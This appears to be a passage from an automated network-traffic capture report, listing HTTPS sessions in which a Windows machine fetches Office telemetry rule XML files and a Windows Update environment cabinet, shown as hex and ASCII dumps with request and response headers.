                                                                                                                                                                                                2024-11-24 02:04:25 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20
                                                                                                                                                                                                Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
                                                                                                                                                                                                2024-11-24 02:04:25 UTC16384INData Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d
                                                                                                                                                                                                Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
                                                                                                                                                                                                2024-11-24 02:04:25 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20
                                                                                                                                                                                                Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
                                                                                                                                                                                                2024-11-24 02:04:25 UTC16384INData Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20
                                                                                                                                                                                                Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
                                                                                                                                                                                                2024-11-24 02:04:25 UTC16384INData Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e
                                                                                                                                                                                                Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
                                                                                                                                                                                                2024-11-24 02:04:25 UTC16384INData Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22
                                                                                                                                                                                                Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
                                                                                                                                                                                                2024-11-24 02:04:25 UTC16384INData Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43
                                                                                                                                                                                                Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
                                                                                                                                                                                                2024-11-24 02:04:25 UTC16384INData Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
                                                                                                                                                                                                2024-11-24 02:04:25 UTC16384INData Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                8192.168.2.5497114.175.87.197443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-24 02:04:25 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=O+PWlvUr11LBdsr&MD=VdRA74wY HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                Host: slscr.update.microsoft.com
                                                                                                                                                                                                2024-11-24 02:04:25 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                Expires: -1
                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                                                MS-CorrelationId: 303c652b-8d8f-4e76-b544-85bbdd88d274
                                                                                                                                                                                                MS-RequestId: b268ac13-42f4-4ef3-b969-54258d796ec6
                                                                                                                                                                                                MS-CV: /J0ld+apZEeNtubg.0
                                                                                                                                                                                                X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                                                Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                Date: Sun, 24 Nov 2024 02:04:24 GMT
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 24490
                                                                                                                                                                                                2024-11-24 02:04:25 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                                                Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                                                2024-11-24 02:04:25 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                                                Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                9192.168.2.54971813.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-24 02:04:27 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-24 02:04:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sun, 24 Nov 2024 02:04:27 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 450
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                                                                                                ETag: "0x8DC582BD4C869AE"
                                                                                                                                                                                                x-ms-request-id: 05856cf7-f01e-0020-4060-3b956b000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241124T020427Z-178bfbc474b9xljthC1NYCtw94000000057g0000000095gx
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-24 02:04:27 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                10192.168.2.54972113.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-24 02:04:27 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-24 02:04:28 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sun, 24 Nov 2024 02:04:27 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 2160
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                ETag: "0x8DC582BA3B95D81"
                                                                                                                                                                                                x-ms-request-id: 2aa1f1ad-b01e-003d-7c43-3cd32c000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241124T020427Z-174c587ffdf8fcgwhC1TEBnn70000000040g000000002sbq
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-24 02:04:28 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                11192.168.2.54971913.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-24 02:04:27 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-24 02:04:28 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sun, 24 Nov 2024 02:04:27 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 2980
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                                ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                                x-ms-request-id: 6b6b0dda-801e-0083-096a-3cf0ae000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241124T020427Z-174c587ffdfmrvb9hC1TEBtn3800000003p000000000ugen
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-24 02:04:28 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                12192.168.2.54971713.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-24 02:04:27 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-24 02:04:28 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sun, 24 Nov 2024 02:04:27 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 3788
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                                ETag: "0x8DC582BAC2126A6"
                                                                                                                                                                                                x-ms-request-id: 1c744767-001e-0082-6060-3b5880000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241124T020427Z-178bfbc474btrnf9hC1NYCb80g00000005k00000000016zc
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
